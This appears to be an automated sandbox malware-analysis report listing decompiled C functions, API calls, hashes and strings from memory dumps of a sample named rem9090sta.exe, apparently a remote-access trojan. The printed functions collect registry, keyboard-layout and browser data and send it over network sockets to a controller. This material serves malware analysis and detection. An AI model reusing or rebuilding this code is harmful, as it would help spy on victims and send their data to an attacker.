                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: PF$PF
                                                                                                • API String ID: 1649129571-46260917
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00411075(short* __ecx, char __edx, void* __eflags, char _a4) {
                                                                                                				char _v5;
                                                                                                				void* _v12;
                                                                                                				char _v36;
                                                                                                				char _v60;
                                                                                                				char _v84;
                                                                                                				char _v108;
                                                                                                				char _v132;
                                                                                                				char _v156;
                                                                                                				char _v180;
                                                                                                				char _v204;
                                                                                                				char _v228;
                                                                                                				void* __ebx;
                                                                                                				void* _t28;
                                                                                                				void* _t35;
                                                                                                				void* _t36;
                                                                                                				void* _t61;
                                                                                                				short* _t116;
                                                                                                				void* _t120;
                                                                                                				void* _t121;
                                                                                                				void* _t122;
                                                                                                
                                                                                                				_t103 = __edx;
                                                                                                				_t121 = _t120 - 0x18;
                                                                                                				_v5 = __edx;
                                                                                                				_t116 = __ecx;
                                                                                                				E004020DE(_t61, _t121, __edx, __eflags,  &_a4);
                                                                                                				_t28 = E00410FE4(_t61, __eflags);
                                                                                                				_t122 = _t121 + 0x18;
                                                                                                				_t62 = 0;
                                                                                                				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v12) != 0) {
                                                                                                					E00402076(0, _t122 - 0x18, "3");
                                                                                                					_push(0x72);
                                                                                                					E00404BB7(0, 0x46e7b0, _t103, __eflags);
                                                                                                				} else {
                                                                                                					E00410DBD(_v12);
                                                                                                					_t35 = E00417D8C(0,  &_v228, 0x46e780);
                                                                                                					_t36 = E00417D8C(0x46e768,  &_v204, 0x46e768);
                                                                                                					_t127 = _v5;
                                                                                                					_t107 =  ==  ? "0" : "1";
                                                                                                					E00402F85(0x46e768, _t122 - 0x18, E00402F85(0x46e768,  &_v36, E00402F85(0x46e768,  &_v60, E00402F85(0x46e768,  &_v84, E00402F0F( &_v108, E00402F85(0x46e768,  &_v132, E00402F0F( &_v156, E00405416( &_v180,  ==  ? "0" : "1", _v5, 0x46e250), _t36), _v5, 0x46e250), _t35), _v5, 0x46e250), _t127, 0x46e798), _t127, 0x46e250), _t127, 0x46e830);
                                                                                                					_push(0x71);
                                                                                                					E00404BB7(0x46e768, 0x46e7b0, _t44, _t127);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00409DFE(0x46e768, 0x46e780, 0x46079c);
                                                                                                					E00409DFE(0x46e768, 0x46e768, 0x46079c);
                                                                                                					E00405BB7(0x46e768, 0x46e798, 0x460734);
                                                                                                					E00405BB7(0x46e768, 0x46e830, 0x460734);
                                                                                                					RegCloseKey(_v12);
                                                                                                					_t62 = 1;
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				return _t62;
                                                                                                 			}

                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 004110AA
                                                                                                  • Part of subcall function 00410DBD: RegQueryInfoKeyW.ADVAPI32 ref: 00410E24
                                                                                                  • Part of subcall function 00410DBD: RegEnumKeyExW.ADVAPI32 ref: 00410E53
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • RegCloseKey.ADVAPI32(?,00460734,00460734,0046079C,0046079C,00000071), ref: 004111FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                • String ID: 0F$PF$hF
                                                                                                • API String ID: 3114080316-2901678694
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E004085C0(void* __ecx, void* __edx, char _a4) {
                                                                                                				char _v11;
                                                                                                				char _v15;
                                                                                                				char _v16;
                                                                                                				char _v40;
                                                                                                				char _v64;
                                                                                                				char _v88;
                                                                                                				char _v112;
                                                                                                				char _v136;
                                                                                                				char _v160;
                                                                                                				char _v184;
                                                                                                				char _v208;
                                                                                                				char _v232;
                                                                                                				char _v256;
                                                                                                				char _v280;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed char* _t39;
                                                                                                				void* _t40;
                                                                                                				void* _t44;
                                                                                                				void* _t45;
                                                                                                				void* _t57;
                                                                                                				void* _t117;
                                                                                                				intOrPtr _t119;
                                                                                                				void* _t132;
                                                                                                				void* _t135;
                                                                                                
                                                                                                				_t117 = __edx;
                                                                                                				E00401F9F(__ecx + 0x90,  &_a4);
                                                                                                				_v16 = 0;
                                                                                                				_v15 = 0;
                                                                                                				_v11 = 0;
                                                                                                				GetKeyboardLayoutNameA( &_v16);
                                                                                                				E00404943(0x46e460);
                                                                                                				E004049DE(0x46e460, _t132, 0x46e460);
                                                                                                				_t39 = E00401F87(E00401E3B(0x46e3a4, _t117, 0, 0x12));
                                                                                                				_t40 = E00401E3B(0x46e3a4, _t117, 0, 0x2a);
                                                                                                				_t44 = E00417C16(0x46e250,  &_v280, E00418473(E00401EDD(0x46e410)));
                                                                                                				_t119 =  *0x46e458; // 0x0
                                                                                                				_t45 = E00417C16(0x46e250,  &_v256, _t119);
                                                                                                				E00402F85(0x46e250, _t135 - 0x18, E00402F85(0x46e250,  &_v40, E00402F85(0x46e250,  &_v64, E00402F85(0x46e250,  &_v88, E00402F0F( &_v112, E00402F85(0x46e250,  &_v136, E00402F0F( &_v160, E00402F85(0x46e250,  &_v184, E00407723(0x46e250,  &_v208, E00405416( &_v232,  &_v16, 0, 0x46e250), _t135 - 0x18, 0,  *_t39 & 0x000000ff), 0, 0x46e250), _t45), 0, 0x46e250), _t44), 0, 0x46e250), 0,  &_a4), 0, 0x46e250), 0, _t40);
                                                                                                				_push(0x12);
                                                                                                				_t57 = E00404BB7(0x46e250, 0x46e460, _t55, 0);
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return _t57;
                                                                                                			}

                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32 ref: 004085EA
                                                                                                  • Part of subcall function 004049DE: connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                  • Part of subcall function 00418473: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00408646,0046E250,?,0046E250,00000000), ref: 00418488
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                • String ID: PF$`F$`F$hpg
                                                                                                • API String ID: 1634807452-2350595
                                                                                                • Opcode ID: 3bad36c2e35c944cfa3f639b08be45d2f68d2a4805d1172115b9c01d4fae8bcc
                                                                                                • Instruction ID: cf9aae1397a1510031da4f9d30786636f186c8b76d24d67c8d9f72cfcfab79f5
                                                                                                • Opcode Fuzzy Hash: 3bad36c2e35c944cfa3f639b08be45d2f68d2a4805d1172115b9c01d4fae8bcc
                                                                                                • Instruction Fuzzy Hash: 7A41A271A001194BC718F7B5D892EEDB3B9AF84308F10417FE506B71D2EE789E498A58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 88%
                                                                                                			E0043DF6A(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				void* _v12;
                                                                                                				char _v16;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t36;
                                                                                                				struct HINSTANCE__* _t37;
                                                                                                				struct HINSTANCE__* _t43;
                                                                                                				intOrPtr* _t44;
                                                                                                				intOrPtr* _t45;
                                                                                                				CHAR* _t49;
                                                                                                				struct HINSTANCE__* _t50;
                                                                                                				void* _t52;
                                                                                                				struct HINSTANCE__* _t55;
                                                                                                				intOrPtr* _t59;
                                                                                                				struct HINSTANCE__* _t64;
                                                                                                				intOrPtr _t65;
                                                                                                
                                                                                                				_t52 = __ecx;
                                                                                                				if(_a4 == 2 || _a4 == 1) {
                                                                                                					E00448529(_t52);
                                                                                                					GetModuleFileNameA(0, 0x46d3c8, 0x104);
                                                                                                					_t49 =  *0x46da3c; // 0x653420
                                                                                                					 *0x46da44 = 0x46d3c8;
                                                                                                					if(_t49 == 0 ||  *_t49 == 0) {
                                                                                                						_t49 = 0x46d3c8;
                                                                                                					}
                                                                                                					_v8 = 0;
                                                                                                					_v16 = 0;
                                                                                                					E0043E08E(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                                                					_t64 = E0043E203(_v8, _v16, 1);
                                                                                                					if(_t64 != 0) {
                                                                                                						E0043E08E(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                                						if(_a4 != 1) {
                                                                                                							_v12 = 0;
                                                                                                							_push( &_v12);
                                                                                                							_t50 = E00448044(_t49, 0, _t64, _t64);
                                                                                                							if(_t50 == 0) {
                                                                                                								_t59 = _v12;
                                                                                                								_t55 = 0;
                                                                                                								_t36 = _t59;
                                                                                                								if( *_t59 == 0) {
                                                                                                									L15:
                                                                                                									_t37 = 0;
                                                                                                									 *0x46da30 = _t55;
                                                                                                									_v12 = 0;
                                                                                                									_t50 = 0;
                                                                                                									 *0x46da34 = _t59;
                                                                                                									L16:
                                                                                                									E004414D5(_t37);
                                                                                                									_v12 = 0;
                                                                                                									goto L17;
                                                                                                								} else {
                                                                                                									goto L14;
                                                                                                								}
                                                                                                								do {
                                                                                                									L14:
                                                                                                									_t36 = _t36 + 4;
                                                                                                									_t55 =  &(_t55->i);
                                                                                                								} while ( *_t36 != 0);
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							_t37 = _v12;
                                                                                                							goto L16;
                                                                                                						}
                                                                                                						 *0x46da30 = _v8 - 1;
                                                                                                						_t43 = _t64;
                                                                                                						_t64 = 0;
                                                                                                						 *0x46da34 = _t43;
                                                                                                						goto L10;
                                                                                                					} else {
                                                                                                						_t44 = E00438932();
                                                                                                						_push(0xc);
                                                                                                						_pop(0);
                                                                                                						 *_t44 = 0;
                                                                                                						L10:
                                                                                                						_t50 = 0;
                                                                                                						L17:
                                                                                                						E004414D5(_t64);
                                                                                                						return _t50;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t45 = E00438932();
                                                                                                					_t65 = 0x16;
                                                                                                					 *_t45 = _t65;
                                                                                                					E00437709();
                                                                                                					return _t65;
                                                                                                				}
                                                                                                			}

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000104), ref: 0043DFAA
                                                                                                • _free.LIBCMT ref: 0043E075
                                                                                                • _free.LIBCMT ref: 0043E07F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: 4e$C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                                • API String ID: 2506810119-3999612958
                                                                                                • Opcode ID: f7dad2b6f2b6daa974b10016e059f90a52307d051cb4cfa90bfd63d507b453ed
                                                                                                • Instruction ID: abc5074902d6b67550d0f801453305f63299cc00a6aadf52a9b33c5c6fba2338
                                                                                                • Opcode Fuzzy Hash: f7dad2b6f2b6daa974b10016e059f90a52307d051cb4cfa90bfd63d507b453ed
                                                                                                • Instruction Fuzzy Hash: 4631B371E05218AFDB25DF96DC819AEBBBCEB88314F10506BF40497351D6B84E41CB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0043E5E7(signed int __eax, void* __ecx) {
                                                                                                				signed int _t2;
                                                                                                				signed int _t3;
                                                                                                				int _t10;
                                                                                                				int _t11;
                                                                                                				void* _t13;
                                                                                                				char** _t16;
                                                                                                				short* _t19;
                                                                                                				void* _t20;
                                                                                                
                                                                                                				_t13 = __ecx;
                                                                                                				_t16 =  *0x46d4d0; // 0x65eb40
                                                                                                				if(_t16 != 0) {
                                                                                                					_t10 = 0;
                                                                                                					while( *_t16 != _t10) {
                                                                                                						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                                                                                                						_t11 = _t2;
                                                                                                						if(_t11 == 0) {
                                                                                                							L11:
                                                                                                							_t3 = _t2 | 0xffffffff;
                                                                                                						} else {
                                                                                                							_t19 = E00440628(_t13, _t11, 2);
                                                                                                							_pop(_t13);
                                                                                                							if(_t19 == 0) {
                                                                                                								L10:
                                                                                                								_t2 = E004414D5(_t19);
                                                                                                								goto L11;
                                                                                                							} else {
                                                                                                								_t10 = 0;
                                                                                                								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                                                                                                									goto L10;
                                                                                                								} else {
                                                                                                									_push(0);
                                                                                                									_push(_t19);
                                                                                                									E00448F9A(_t13);
                                                                                                									E004414D5(0);
                                                                                                									_t20 = _t20 + 0xc;
                                                                                                									_t16 =  &(_t16[1]);
                                                                                                									continue;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L9:
                                                                                                						return _t3;
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					_t3 = 0;
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					return __eax | 0xffffffff;
                                                                                                				}
                                                                                                				L12:
                                                                                                			}












                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @e
                                                                                                • API String ID: 0-2994471477
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E00417043(void* __ebx) {
                                                                                                				char _v28;
                                                                                                				void* _t12;
                                                                                                				void* _t29;
                                                                                                				void* _t30;
                                                                                                				signed int _t38;
                                                                                                				void* _t40;
                                                                                                
                                                                                                				_t18 = __ebx;
                                                                                                				_t40 = (_t38 & 0xfffffff8) - 0x18;
                                                                                                				_t31 = 0x30;
                                                                                                				E004189FF(_t40, 0x30, "alarm.wav");
                                                                                                				if(PathFileExistsW(E00401EDD( &_v28)) != 0) {
                                                                                                					L7:
                                                                                                					E004170FB(E00401EDD( &_v28), _t31);
                                                                                                				} else {
                                                                                                					_t31 = 0x460734;
                                                                                                					if(E00405C1B(0x460734) == 0) {
                                                                                                						_t12 = E00401EDD( &_v28);
                                                                                                						E004020DE(__ebx, _t40 - 0x18, 0x460734, __eflags, 0x46eb48);
                                                                                                						E0041843E(_t12);
                                                                                                						goto L7;
                                                                                                					} else {
                                                                                                						_t46 =  *0x46de9b;
                                                                                                						_t29 = _t40 - 0x18;
                                                                                                						_push(0x466b0c);
                                                                                                						if( *0x46de9b == 0) {
                                                                                                							E00402076(__ebx, _t29);
                                                                                                							_t30 = 0x46e848;
                                                                                                						} else {
                                                                                                							E00402076(__ebx, _t29);
                                                                                                							_t30 = 0x46eb60;
                                                                                                						}
                                                                                                						_push(0xa1);
                                                                                                						E00404BB7(_t18, _t30, _t31, _t46);
                                                                                                					}
                                                                                                				}
                                                                                                				return E00401EE2();
                                                                                                			}










                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00413D7F,00000000), ref: 00417068
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: HF$HF$`F$alarm.wav
                                                                                                • API String ID: 1174141254-2317669264
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E00419839() {
                                                                                                				char _v20;
                                                                                                				struct _WNDCLASSEXA _v68;
                                                                                                				void* __edi;
                                                                                                				struct HWND__* _t20;
                                                                                                				void* _t23;
                                                                                                
                                                                                                				E00432D80(_t23,  &(_v68.style), 0, 0x2c);
                                                                                                				_v68.cbSize = 0x30;
                                                                                                				_v68.style = 0;
                                                                                                				_v68.lpfnWndProc = E004198B9;
                                                                                                				_v68.cbClsExtra = 0;
                                                                                                				asm("movsd");
                                                                                                				_v68.lpszClassName =  &_v20;
                                                                                                				_v68.cbWndExtra = 0;
                                                                                                				asm("movsd");
                                                                                                				_v68.lpszMenuName = 0;
                                                                                                				asm("movsd");
                                                                                                				asm("movsw");
                                                                                                				asm("movsb");
                                                                                                				if(RegisterClassExA( &_v68) == 0) {
                                                                                                					L3:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                                                                                				if(_t20 == 0) {
                                                                                                					GetLastError();
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				return _t20;
                                                                                                			}









                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E0041097D(void* __ecx) {
                                                                                                				void* _v8;
                                                                                                				int _v12;
                                                                                                				char _v2060;
                                                                                                				void* _t17;
                                                                                                				void* _t21;
                                                                                                
                                                                                                				_v12 = 0x400;
                                                                                                				_t21 = __ecx;
                                                                                                				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
                                                                                                					_push(0x46079c);
                                                                                                				} else {
                                                                                                					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
                                                                                                					RegCloseKey(_v8);
                                                                                                					_push( &_v2060);
                                                                                                				}
                                                                                                				E00404260(_t17, _t21);
                                                                                                				return _t21;
                                                                                                			}









                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,hpg,?), ref: 004109A7
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 004109C2
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004109CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: hpg$http\shell\open\command
                                                                                                • API String ID: 3677997916-1602025989
                                                                                                • Opcode ID: 30060840d79008935352a66e13825c7d0c8c5640c038a8d5412f09944e178519
                                                                                                • Instruction ID: 6e3bcc991b989e323dd396b0908a6ddb8c3ffb1d982f8e1382222d74d1baac98
                                                                                                • Opcode Fuzzy Hash: 30060840d79008935352a66e13825c7d0c8c5640c038a8d5412f09944e178519
                                                                                                • Instruction Fuzzy Hash: 52F02871600108FBDB509695DC09EDFBBBCEBC0B05F1000ABB604F2151DA745E8487A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E0040B84F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                				char _v16;
                                                                                                				signed int _t34;
                                                                                                				signed int* _t49;
                                                                                                				signed int* _t57;
                                                                                                				void* _t65;
                                                                                                				signed int* _t66;
                                                                                                
                                                                                                				_t65 = __ecx;
                                                                                                				E00430DB5(__ecx, 0);
                                                                                                				E0040D4EF(__ecx + 4);
                                                                                                				E0040D4EF(__ecx + 0xc);
                                                                                                				E0040D4D9(__ecx + 0x14);
                                                                                                				E0040D4D9(__ecx + 0x1c);
                                                                                                				E0040D4EF(__ecx + 0x24);
                                                                                                				E0040D4EF(__ecx + 0x2c);
                                                                                                				_t76 = _a4;
                                                                                                				if(_a4 == 0) {
                                                                                                					_t49 =  &_v16;
                                                                                                					E0040B7F4(_t49, "bad locale name");
                                                                                                					E00432EDA( &_v16, 0x469700);
                                                                                                					asm("int3");
                                                                                                					_push(_t65);
                                                                                                					_t66 = _t49;
                                                                                                					E00431148(_t66);
                                                                                                					E0040D4D4( &(_t66[0xb]));
                                                                                                					E0040D4D4( &(_t66[9]));
                                                                                                					E0040D4D4( &(_t66[7]));
                                                                                                					E0040D4D4( &(_t66[5]));
                                                                                                					E0040D4D4( &(_t66[3]));
                                                                                                					E0040D4D4( &(_t66[1]));
                                                                                                					_t57 = _t66;
                                                                                                					_t34 =  *_t57;
                                                                                                					__eflags = _t34;
                                                                                                					if(_t34 == 0) {
                                                                                                						return E00440405(4);
                                                                                                					} else {
                                                                                                						__eflags = _t34 - 8;
                                                                                                						if(_t34 < 8) {
                                                                                                							_t37 = 0x46d050 + _t34 * 0x18;
                                                                                                							__eflags = 0x46d050 + _t34 * 0x18;
                                                                                                							return E0043165A(0x46d050 + _t34 * 0x18, _t37);
                                                                                                						}
                                                                                                						return _t34;
                                                                                                					}
                                                                                                				} else {
                                                                                                					E004310FD(__ebx, __edx, __edi, _t76, __ecx, _a4);
                                                                                                					return _t65;
                                                                                                				}
                                                                                                			}










                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040B85A
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B899
                                                                                                  • Part of subcall function 004310FD: _Yarn.LIBCPMT ref: 0043111C
                                                                                                  • Part of subcall function 004310FD: _Yarn.LIBCPMT ref: 00431140
                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040B8B1
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B8BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3706160523-1405518554
                                                                                                • Opcode ID: eb2eba8a977bc22fc332e77fda7d5bd42b1db41f8b508866d3809a01866c4b14
                                                                                                • Instruction ID: 69cd383198d7d2b34103a1576342d891162d40902a052bf2cad09b087f02cfff
                                                                                                • Opcode Fuzzy Hash: eb2eba8a977bc22fc332e77fda7d5bd42b1db41f8b508866d3809a01866c4b14
                                                                                                • Instruction Fuzzy Hash: 40F031318002046AC234FAA6D953EDA77A49F14718F50453FF516625D1AF7CBA4CC69D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E004051C8(void* __ecx, void* __edx, char _a4) {
                                                                                                				void* _t17;
                                                                                                				void* _t22;
                                                                                                				void* _t23;
                                                                                                				void* _t24;
                                                                                                
                                                                                                				_t23 = __ecx;
                                                                                                				if( *((char*)(__ecx + 0x5c)) == 0) {
                                                                                                					return 0;
                                                                                                				}
                                                                                                				if(_a4 == 0) {
                                                                                                					_t25 = _t24 - 0x18;
                                                                                                					E00402076(_t17, _t24 - 0x18, "Connection KeepAlive | Disabled");
                                                                                                					E00402076(_t17, _t25 - 0x18, "!");
                                                                                                					E00417670(_t17, _t22);
                                                                                                				}
                                                                                                				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
                                                                                                				SetEvent( *(_t23 + 0x60));
                                                                                                				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
                                                                                                				CloseHandle( *(_t23 + 0x64));
                                                                                                				return 1;
                                                                                                			}








                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046E268), ref: 00405206
                                                                                                • SetEvent.KERNEL32(?), ref: 00405212
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040521D
                                                                                                • CloseHandle.KERNEL32(?), ref: 00405226
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                Strings
                                                                                                • Connection KeepAlive | Disabled, xrefs: 004051DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: Connection KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-3818284553
                                                                                                • Opcode ID: 2d9afaaf9e3e870e82b71fd5ca7069e492c1f110bd892313dd017f26f82a3c5b
                                                                                                • Instruction ID: 2bddbfc1ee49df3e12611f40a97416ebc0ed06e16b092b6b91d408743b26951f
